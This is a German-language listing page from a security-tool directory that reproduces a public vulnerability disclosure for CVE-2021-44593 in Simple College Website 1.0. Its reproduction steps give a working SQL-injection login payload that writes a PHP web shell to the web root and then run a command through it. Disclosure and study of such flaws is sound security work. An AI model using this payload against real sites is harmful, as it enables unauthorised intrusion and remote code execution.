Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/mister-joe/cve-2021-44593
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmister-joe/cve-2021-44593

CVE-2021-44593

Öffentliche Offenlegung und Writeup zu CVE-2021-44593, einer nicht authentifizierten SQL-Injection in Simple College Website, die zu beliebigem Datei-Upload und Remote-Code-Ausführung führt.

Repository anzeigen
22vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-44593

Öffentliche Offenlegung von CVE-2021-44593. Eine SQL-Injection/Arbitrary File Upload/Remote Code Execution-Schwachstelle in Simple College Website.

BESCHREIBUNG

Simple College Website 1.0 ist anfällig für eine nicht authentifizierte UNION-basierte SQL-Injection im Parameter „username“ der Seite /admin/login.php, die anschließend genutzt werden kann, um beliebige Dateien hochzuladen und Remote Code Execution zu erlangen.

BETROFFENE KOMPONENTEN

Die Funktion login() in admin_class.php

SCHRITTE ZUR REPRODUKTION

  1. Rufen Sie die Admin-Login-Seite auf (normalerweise /admin/login.php)
  2. Senden Sie das Login-Formular mit dem POST-Parameter „username“ ab, der die folgende UNION-basierte SQL-Injection enthält:
root@kitploit:~
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
  1. Navigieren Sie zu /testing.php?cmd=id

HINWEISE

  1. Kenntnis des Speicherorts des Webserver-Root-Verzeichnisses ist erforderlich.
  2. Kenntnis des Speicherorts des Dokument-Root-Verzeichnisses kann ebenfalls erforderlich sein, falls es sich nicht um dasselbe Verzeichnis wie das Webserver-Root-Verzeichnis handelt.
  3. Darüber hinaus muss der MySQL-Daemon Schreibrechte für das genannte Verzeichnis besitzen.
Tool herunterladen